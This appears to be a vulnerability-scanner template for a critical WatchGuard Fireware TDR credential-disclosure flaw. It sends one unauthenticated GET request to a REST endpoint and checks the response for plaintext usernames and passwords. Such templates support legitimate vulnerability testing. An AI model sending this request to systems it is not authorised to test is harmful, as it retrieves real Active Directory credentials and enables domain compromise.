id: watchguard-credentials-disclosure info: name: WatchGuard Fireware AD Helper Component - Credentials Disclosure author: gy741 severity: critical description: WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext. reference: - https://www.exploit-db.com/exploits/48203 - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability classification: cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-288 tags: watchguard,disclosure requests: - method: GET path: - "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" matchers-condition: and matchers: - type: word part: body words: - '"fullyQualifiedName"' - '"logonDomain"' - '"username"' - '"password"' condition: and - type: status status: - 200 # Enhanced by mp on 2022/06/03